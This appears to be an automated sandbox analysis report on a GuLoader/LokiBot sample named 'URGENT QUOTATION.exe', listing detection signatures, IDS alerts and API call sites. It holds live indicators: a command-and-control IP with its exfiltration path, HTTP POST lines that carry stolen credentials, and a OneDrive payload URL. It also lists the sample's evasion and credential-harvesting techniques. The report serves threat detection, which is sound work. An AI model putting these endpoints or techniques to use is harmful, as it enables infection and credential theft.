Play interactive tour

Edit tour

Analysis Report URGENT QUOTATION.exe

Overview

General Information

Sample Name:	URGENT QUOTATION.exe
Analysis ID:	356236
MD5:	b49c71be94624173a9683580c792b195
SHA1:	4b78a8199129007580b91060db70ce44fe7278e5
SHA256:	8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
Tags:	GuLoader
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Yara detected VB6 Downloader Generic

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

URGENT QUOTATION.exe (PID: 6160 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)

URGENT QUOTATION.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: URGENT QUOTATION.exe PID: 6160	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: URGENT QUOTATION.exe PID: 6160	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: URGENT QUOTATION.exe PID: 6792	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: URGENT QUOTATION.exe PID: 6792	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: http://51.195.53.221/p.php/594QbwaP456AN

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: URGENT QUOTATION.exe	Virustotal: Detection: 28%			Perma Link
Source: URGENT QUOTATION.exe	ReversingLabs: Detection: 48%

Machine Learning detection for sample

Show sources

Source: URGENT QUOTATION.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: URGENT QUOTATION.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 51.195.53.221:80

Source: Joe Sandbox View

IP Address: 51.195.53.221 51.195.53.221

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.53.221

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: unknown

HTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Feb 2021 18:55:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8

Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: URGENT QUOTATION.exe

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021853EC NtWriteVirtualMemory,	0_2_021853EC
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218613D NtSetInformationThread,NtMapViewOfSection,	0_2_0218613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02185CF0 NtProtectVirtualMemory,	0_2_02185CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021804E7 EnumWindows,NtSetInformationThread,NtWriteVirtualMemory,	0_2_021804E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186210 NtMapViewOfSection,	0_2_02186210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186239 NtMapViewOfSection,	0_2_02186239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186263 NtMapViewOfSection,	0_2_02186263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186281 NtMapViewOfSection,	0_2_02186281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186315 NtMapViewOfSection,	0_2_02186315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218633D NtMapViewOfSection,	0_2_0218633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186328 NtMapViewOfSection,	0_2_02186328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186353 NtMapViewOfSection,	0_2_02186353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186387 NtMapViewOfSection,	0_2_02186387
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218182B NtWriteVirtualMemory,	0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182822 NtWriteVirtualMemory,	0_2_02182822
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182873 NtWriteVirtualMemory,	0_2_02182873
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021820B4 NtSetInformationThread,	0_2_021820B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021828CA NtWriteVirtualMemory,	0_2_021828CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218290F NtWriteVirtualMemory,	0_2_0218290F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186145 NtMapViewOfSection,	0_2_02186145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218216A NtSetInformationThread,NtWriteVirtualMemory,	0_2_0218216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186161 NtMapViewOfSection,	0_2_02186161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186197 NtMapViewOfSection,	0_2_02186197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021861B5 NtMapViewOfSection,	0_2_021861B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021861F5 NtMapViewOfSection,	0_2_021861F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02180602 NtSetInformationThread,	0_2_02180602
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182605 NtWriteVirtualMemory,	0_2_02182605
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218063F NtSetInformationThread,	0_2_0218063F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182666 NtWriteVirtualMemory,	0_2_02182666
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182689 NtWriteVirtualMemory,	0_2_02182689
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021826B2 NtWriteVirtualMemory,	0_2_021826B2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021826F9 NtWriteVirtualMemory,	0_2_021826F9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182727 NtWriteVirtualMemory,	0_2_02182727
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182773 NtWriteVirtualMemory,	0_2_02182773
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021827A3 NtWriteVirtualMemory,	0_2_021827A3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218247B NtWriteVirtualMemory,	0_2_0218247B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021824D3 NtWriteVirtualMemory,	0_2_021824D3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021824EB NtWriteVirtualMemory,	0_2_021824EB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021814E5 NtWriteVirtualMemory,	0_2_021814E5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182523 NtWriteVirtualMemory,	0_2_02182523
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218058F NtSetInformationThread,	0_2_0218058F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182581 NtWriteVirtualMemory,	0_2_02182581
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021825B7 NtWriteVirtualMemory,	0_2_021825B7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021805AB NtSetInformationThread,	0_2_021805AB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021805CD NtSetInformationThread,	0_2_021805CD
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021845FA NtSetInformationThread,NtWriteVirtualMemory,	0_2_021845FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00565CF0 NtProtectVirtualMemory,	4_2_00565CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562CB0 Sleep,NtProtectVirtualMemory,	4_2_00562CB0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_0056216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056210E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_0056210E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056613D NtSetInformationThread,	4_2_0056613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562DB2 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562DB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005620B4 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_005620B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562D5B NtProtectVirtualMemory,	4_2_00562D5B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562144 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562144
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566145 NtSetInformationThread,	4_2_00566145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056217B NtProtectVirtualMemory,	4_2_0056217B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566161 NtSetInformationThread,	4_2_00566161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562117 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562117
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562D26 NtProtectVirtualMemory,	4_2_00562D26
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562D29 NtProtectVirtualMemory,	4_2_00562D29
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005661F5 NtSetInformationThread,	4_2_005661F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005621EF NtProtectVirtualMemory,	4_2_005621EF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562D96 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562D96
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566197 NtSetInformationThread,	4_2_00566197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562D99 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562D99
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005621B5 NtProtectVirtualMemory,	4_2_005621B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005661B5 NtSetInformationThread,	4_2_005661B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562DBB LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562DBB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562E46 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562E46
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566263 NtSetInformationThread,	4_2_00566263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566210 NtSetInformationThread,	4_2_00566210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562E0F LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00562E0F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566239 NtSetInformationThread,	4_2_00566239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566281 NtSetInformationThread,	4_2_00566281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566353 NtSetInformationThread,	4_2_00566353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566315 NtSetInformationThread,	4_2_00566315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056633D NtSetInformationThread,	4_2_0056633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566328 NtSetInformationThread,	4_2_00566328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00566387 NtSetInformationThread,	4_2_00566387

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 4_2_00562F0F

4_2_00562F0F

Source: URGENT QUOTATION.exe, 00000000.00000000.646889990.000000000043B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000000.00000002.674117945.0000000002140000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711483674.000000001DD80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711498445.000000001DED0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000000.671322005.000000000043B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe	Binary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe

Source: URGENT QUOTATION.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

File created: C:\Users\user\AppData\Local\Temp\~DFBD8596DEFB17F0B4.TMP

Jump to behavior

Source: URGENT QUOTATION.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: URGENT QUOTATION.exe	Virustotal: Detection: 28%
Source: URGENT QUOTATION.exe	ReversingLabs: Detection: 48%

Source: unknown	Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: unknown	Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'	Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match	File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match	File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match	File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY

Source: URGENT QUOTATION.exe

Static PE information: real checksum: 0x29a19 should be: 0x2d90a

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218321F push ebx; iretd	0_2_02183222
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218020B push ebx; iretd	0_2_0218020E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02185A39 push ebx; iretd	0_2_02185A3A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218223D push ebx; iretd	0_2_0218223E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218023F push ebx; iretd	0_2_02180242
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02181A31 push ebx; iretd	0_2_02181A32
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02180227 push ebx; iretd	0_2_0218022A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218525B push ebx; iretd	0_2_0218525E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218024B push ebx; iretd	0_2_0218024E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218527B push ebx; iretd	0_2_0218527E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02185A7B push ebx; iretd	0_2_02185A7E
